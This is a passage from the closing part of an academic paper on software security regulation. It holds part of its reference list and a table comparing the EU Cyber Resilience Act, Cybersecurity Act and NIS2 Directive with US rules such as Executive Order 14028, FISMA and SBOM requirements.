  15. Dede, Georgios, Angeliki Petsa, Sotirios Kavalaris, Evangelos Serrelis, Sotirios Evangelatos, Ioannis Oikonomidis, and Theodoros Kamalakis. 2024. Cybersecurity as a contributor toward resilient Internet of Things (IoT) infrastructure and sustainable economic growth. Information 15: 798. [Google Scholar] [CrossRef]
  16. Easterly, Jen, and Tim Fanning. 2023. The Attack on Colonial Pipeline: What We’ve Learned & What We’ve Done Over the Past Two Years. Available online: https://www.cisa.gov/news-events/news/attack-colonial-pipeline-what-weve-learned-what-weve-done-over-past-two-years (accessed on 20 June 2024).
  17. Escobar, Arturo. 1994. Welcome to Cyberia: Notes on the anthropology of cyberculture. Current Anthropology 35: 211–31. [Google Scholar] [CrossRef]
  18. European Commission. 2025. Communication from the Commission to the European Parliament, the Council, the European Economic and Social Committee and the Committee of the Regions on ProtectEU: A European Internal Security Strategy. COM(2025) 148 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52025DC0148 (accessed on 20 June 2024).
  19. European Commission, and High Representative of the Union for Foreign Affairs and Security Policy. 2013. Joint communication to the European Parliament, the Council, the European Economic and Social Committee and the Committee of the Regions: Cybersecurity Strategy of the European Union: An Open, Safe and Secure Cyberspace. JOIN(2013) 1 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52013JC0001 (accessed on 20 June 2024).
  20. European Commission, and High Representative of the Union for Foreign Affairs and Security Policy. 2020. Joint Communication to the European Parliament and the Council: The EU’s Cybersecurity Strategy for the Digital Decade. JOIN(2020) 18 Final. Available online: https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52020JC0018 (accessed on 20 June 2024).
  21. European Parliament and Council. 2019. Regulation (EU) 2019/881 of the European Parliament and of the Council of 17 April 2019 on ENISA (the European Union Agency for Cybersecurity) and on Information and Communications Technology Cybersecurity Certification and Repealing Regulation (EU) No 526/2013 (Cybersecurity Act). Official Journal of the European Union L151: 15–69. Available online: https://eur-lex.europa.eu/eli/reg/2019/881/oj/eng (accessed on 20 June 2024).
  22. European Parliament and Council. 2022. Directive (EU) 2022/2555 of the European Parliament and of the Council of 14 December 2022 on Measures for a High Common Level of Cybersecurity Across the Union (NIS2 Directive). Official Journal of the European Union L333: 80–152. Available online: https://eur-lex.europa.eu/eli/dir/2022/2555/oj/eng (accessed on 20 June 2024).
  23. European Parliament and Council. 2024. Regulation (EU) 2024/2847 of the European Parliament and of the Council of 23 October 2024 on Horizontal Cybersecurity Requirements for Products with Digital Elements and Amending Regulations (EU) No 168/2013 and (EU) 2019/1020 and Directive (EU) 2020/1828 (Cyber Resilience Act). Official Journal of the European Union L2024/2847: 1–177. Available online: https://eur-lex.europa.eu/eli/reg/2024/2847/oj/eng (accessed on 20 June 2024).
  24. Executive Order 14028. 2021. Improving the Nation’s Cybersecurity. Federal Register 86: 26633–45. Available online: https://www.govinfo.gov/content/pkg/FR-2021-05-17/pdf/2021-10460.pdf (accessed on 20 June 2024).
  25. Farkas, Ádám, and László Vikman. 2024. Information operations as a question of law and cyber sovereignty. ELTE Law Journal 12: 187–206. [Google Scholar] [CrossRef]
  26. Federal Information Security Modernization Act (FISMA). 2014. Public Law No: 113–283. Available online: https://www.congress.gov/bill/113th-congress/house-bill/1163 (accessed on 20 June 2025).
  27. Gasiba, Theodora, Ulrich Lechner, and Miguel Pinto-Albuquerque. 2020. Sifu—A cybersecurity awareness platform with challenge assessment and intelligent coach. Cybersecurity 3: 24. [Google Scholar] [CrossRef]
  28. Guo, Wei, Yunlin Fang, Chuanhuang Huang, Haoyu Ou, Changsheng Lin, and Yanfeng Guo. 2022. HyVulDect: A hybrid semantic vulnerability mining system based on graph neural network. Computers & Security 121: 102823. [Google Scholar] [CrossRef]
  29. Hadi, Hanif, Noraidah Ahmad, Khaldoun Aziz, Yuan Cao, and Mohannad A. Alshara. 2024. Cost-effective resilience: A comprehensive survey and tutorial on assessing open-source cybersecurity tools for multi-tiered defense. IEEE Access 12: 194053–76. [Google Scholar] [CrossRef]
  30. Hernández-Ramos, Jose L., Sara N. Matheu, and Antonio Skarmeta. 2021. The Challenges of Software Cybersecurity Certification [Building Security In]. IEEE Security & Privacy 19: 99–102. [Google Scholar] [CrossRef]
  31. ISO (International Organization for Standardization). 2022. Information Security, Cybersecurity and Privacy Protection—Information Security Management Systems—Requirements. ISO/IEC 27001. Geneva: International Organization for Standardization.
  32. Janca, Tanya. 2021. Alice & Bob Learn Application Security. Indianapolis: John Wiley & Sons, Inc. [Google Scholar]
  33. Kamara, Irene. 2024. European cybersecurity standardisation: A tale of two solitudes in view of Europe’s cyber resilience. Innovation: The European Journal of Social Science Research 37: 1441–60. [Google Scholar] [CrossRef]
  34. Kang, Sanggil, and Sehyun Kim. 2022. CIA-level driven secure SDLC framework for integrating security into SDLC process. Journal of Ambient Intelligence and Humanized Computing 13: 4601–24. [Google Scholar] [CrossRef]
  35. Kelemen, Roland. 2023. The impact of the Russian-Ukrainian hybrid war on the European Union’s cybersecurity policies and regulations. Connections: The Quarterly Journal 22: 85–104. [Google Scholar] [CrossRef]
  36. Kelemen, Roland, Joseph Squillace, Richárd Németh, and Justice Cappella. 2024. The impact of digital inequality on IT identity in the light of inequalities in internet access. ELTE Law Journal 12: 173–86. [Google Scholar] [CrossRef]
  37. Khan, Rizwan Ullah, Siffat Ullah Khan, Muhammad Azeem Akbar, and Mohammed H. Alzahrani. 2022. Security risks of global software development life cycle: Industry practitioner’s perspective. Journal of Software: Evolution and Process 34: e2521. [Google Scholar] [CrossRef]
  38. Khurshid, Anum, Reem Alsaaidi, Mudassar Aslam, and Shahid Raza. 2022. EU Cybersecurity Act and IoT Certification: Landscape, Perspective and a Proposed Template Scheme. IEEE Access 10: 129932–48. [Google Scholar] [CrossRef]
  39. Kuday, Ahmet Dogan. 2024. Sustainable Development in the Digital World: The Importance of Cybersecurity. Disaster Medicine and Public Health Preparedness 18: e279. [Google Scholar] [CrossRef]
  40. Kuzior, Aleksandra, Iryna Tiutiunyk, Anna Zielińska, and Roland Kelemen. 2024. Cybersecurity and cybercrime: Current trends and threats. Journal of International Studies 17: 181–92. [Google Scholar] [CrossRef]
  41. Latour, Bruno. 1987. Science in Action: How to Follow Scientists and Engineers Through Society. Cambridge: Harvard University Press. [Google Scholar]
  42. Longo, Antonella, Ali Aghazadeh Ardebili, Alessandro Lazari, and Antonio Ficarella. 2025. Cyber–Physical Resilience: Evolution of Concept, Indicators, and Legal Frameworks. Electronics 14: 1684. [Google Scholar] [CrossRef]
  43. Lucini, Valentino. 2023. The Ever-Increasing Cybersecurity Compliance in Europe: The NIS 2 and What All Businesses in the EU Should Be Aware of. Russian Law Journal 11: 911. [Google Scholar] [CrossRef]
  44. Maurer, Fabian, and Andreas Fritzsche. 2023. Layered structures of robustness and resilience: Evidence from cybersecurity projects for critical infrastructures in Central Europe. Strategic Change 32: 139–53. [Google Scholar] [CrossRef]
  45. Microsoft. 2022. Podpora Proaktívneho Zabezpečenia s Nulovou Dôverou (Zero Trust) [Supporting Proactive Security with Zero Trust]. Available online: https://www.microsoft.com/sk-sk/security/business/zero-trust (accessed on 20 June 2024).
  46. Morales-Sáenz, Francisco Isai, José Melchor Medina-Quintero, and Miguel Reyna-Castillo. 2024. Beyond Data Protection: Exploring the Convergence between Cybersecurity and Sustainable Development in Business. Sustainability 16: 5884. [Google Scholar] [CrossRef]
  47. Nash, Iain. 2021. Cybersecurity in a post-data environment: Considerations on the regulation of code and the role of producer and consumer liability in smart devices. Computer Law & Security Review 40: 105529. [Google Scholar] [CrossRef]
  48. National Cybersecurity Strategy. 2023. Washington, DC: The White House. Available online: https://bidenwhitehouse.archives.gov/wp-content/uploads/2023/03/National-Cybersecurity-Strategy-2023.pdf (accessed on 20 June 2024).
  49. North Atlantic Council. 2018. Brussels Summit Declaration. Available online: https://www.nato.int/cps/en/natohq/official_texts_156624.htm (accessed on 20 June 2024).
  50. Peschka, Vilmos. 1988. A jog sajátossága. Budapest: Akadémiai Kiadó. [Google Scholar]
  51. Pigola, André, and Fernando De Souza Meirelles. 2024. Unraveling trust management in cybersecurity: Insights from a systematic literature review. Information Technology and Management 25: 26. [Google Scholar] [CrossRef]
  52. Popkova, Elena G., Paolo De Bernardi, Yulia G. Tyurina, and Bruno S. Sergi. 2022. A theory of digital technology advancement to address the grand challenges of sustainable development. Technology in Society 68: 101831. [Google Scholar] [CrossRef]
  53. Riggs, Hugo, Shahid Tufail, Imtiaz Parvez, Mohd Tariq, Mohammed Aquib Khan, Asham Amir, Kedari Vuda, and Arif Sarwat. 2023. Impact, Vulnerabilities, and Mitigation Strategies for Cyber-Secure Critical Infrastructure. Sensors 23: 4060. [Google Scholar] [CrossRef]
  54. Saeed, Syed Ali, Sami Ali Altamimi, Nora M. Alkayyal, Eman H. Alshehri, and Dhoha A. Alabbad. 2023. Digital transformation and cybersecurity challenges for businesses resilience: Issues and recommendations. Sensors 23: 6666. [Google Scholar] [CrossRef]
  55. Shaffique, Mohammed Raiz. 2024. Cyber Resilience Act 2022: A silver bullet for cybersecurity of IoT devices or a shot in the dark? Computer Law & Security Review 54: 106009. [Google Scholar] [CrossRef]
  56. Shan, Chaoran, Yuwei Gong, Lingxuan Xiong, Sihan Liao, and Yong Wang. 2022. A software vulnerability detection method based on complex network community. Security and Communication Networks 2022: 3024731. [Google Scholar] [CrossRef]
  57. Sun, Xinchen, Jiazhou Jin, Yuanyuan Yang, and Yushun Pan. 2024. Telling the “bad” to motivate your users to update: Evidence from behavioral and ERP studies. Computers in Human Behavior 153: 108078. [Google Scholar] [CrossRef]
  58. Tan, Zhuoran, Shameem Parambath, Christos Anagnostopoulos, Jeremy Singer, and Angelos Marnerides. 2025. Advanced Persistent Threats Based on Supply Chain Vulnerabilities: Challenges, Solutions, and Future Directions. IEEE Internet of Things Journal 12: 6371–95. [Google Scholar] [CrossRef]
  59. Tashtoush, Yaser M., Dana M. Darweesh, Ghaith S. Husari, Osama Y. Darwish, Yazan Y. Darwish, Lama A. Issa, and Haitham A. Ashqar. 2022. Agile approaches for cybersecurity systems, IoT and intelligent transportation. IEEE Access 10: 3944–65. [Google Scholar] [CrossRef]
  60. U.S. Cybersecurity and Infrastructure Security Agency (CISA). 2024. Secure Software Development Attestation Form Guidance. Available online: https://www.cisa.gov/resources-tools/resources/secure-software-development-attestation-form (accessed on 20 June 2025).
  61. U.S. National Telecommunications and Information Administration (NTIA). 2021. The Minimum Elements for a Software Bill of Materials (SBOM). U.S. Department of Commerce. Available online: https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom (accessed on 20 June 2025).
  62. Van Bossuyt, Douglas L., Brian L. Hale, Robert M. Arlitt, and Nikos Papakonstantinou. 2023. Zero-trust for the system design lifecycle. Journal of Computing and Information Science in Engineering 23: 060812. [Google Scholar] [CrossRef]
  63. Vandezande, Niels. 2024. Cybersecurity in the EU: How the NIS2-directive stacks up against its predecessor. Computer Law & Security Review 52: 105890. [Google Scholar] [CrossRef]
  64. Von Solms, Sune, and Lynn Futcher. 2020. Adaption of a secure software development methodology for secure engineering design. IEEE Access 8: 113381–92. [Google Scholar] [CrossRef]
  65. Wang, Zhitian, Yifan Wen, Zhen Wang, and Pengyu Zhi. 2023. Resilience-based design optimization of engineering systems under degradation and different maintenance strategy. Structural and Multidisciplinary Optimization 66: 219. [Google Scholar] [CrossRef]
  66. World Economic Forum. 2023. The Global Risks Report 2023, 18th ed. Geneva: World Economic Forum. Available online: https://www3.weforum.org/docs/WEF_Global_Risks_Report_2023.pdf (accessed on 20 June 2024).
  67. Xiao, Yaping, and Jelena Spanjol. 2021. Yes, but not now! Why some users procrastinate in adopting digital product updates. Journal of Business Research 135: 701–11. [Google Scholar] [CrossRef]
Figure 1. Flowchart of the research methodology.
Table 1. Synthesis of EU and US regulatory approaches to software security.

| Criteria | EU: Cyber Resilience Act (CRA) | EU: Cybersecurity Act (CSA) | EU: NIS2 Directive | USA: Executive Order 14028, FISMA, SBOM Regulation |
|---|---|---|---|---|
| Responsibility Allocation | Establishes explicit duties for all stakeholders in the digital product supply chain, including manufacturers and developers, with oversight by national authorities. | Establishes a voluntary, EU-wide certification framework, with the EU Agency for Cybersecurity (ENISA) in a central coordinating role. | Places duties on operators of essential and important services to implement risk management measures, supervised by national authorities. | Federal agencies are primarily responsible, but software vendors and suppliers must provide SBOMs and timely updates. |
| User & Entity Obligations | Producers are required to provide clear information, ensure security updates for the product’s expected lifetime (e.g., up to 5 years), and promptly notify users of vulnerabilities. | Provides transparency to users and organizations through voluntary cybersecurity certification schemes and labels, helping to inform purchasing decisions. | No direct obligations towards end-users; the main obligations are incident reporting to national authorities and implementing robust risk management measures. | Vendors are obligated to supply SBOMs, issue regular patches, and communicate vulnerabilities to federal clients. |
| Approach to SDGs | Integrates digital sustainability and consumer protection, aiming for a secure and sustainable digital environment as part of its broader strategies. | Promotes institutional trust (SDG 16) and informed consumer choice, contributing to a more transparent and secure single market. | Reinforces societal resilience by securing critical infrastructure and essential services (e.g., healthcare, energy), contributing to SDGs 9 and 16. | Focuses mainly on national security and protection of federal systems, with less explicit reference to sustainability or SDG principles. |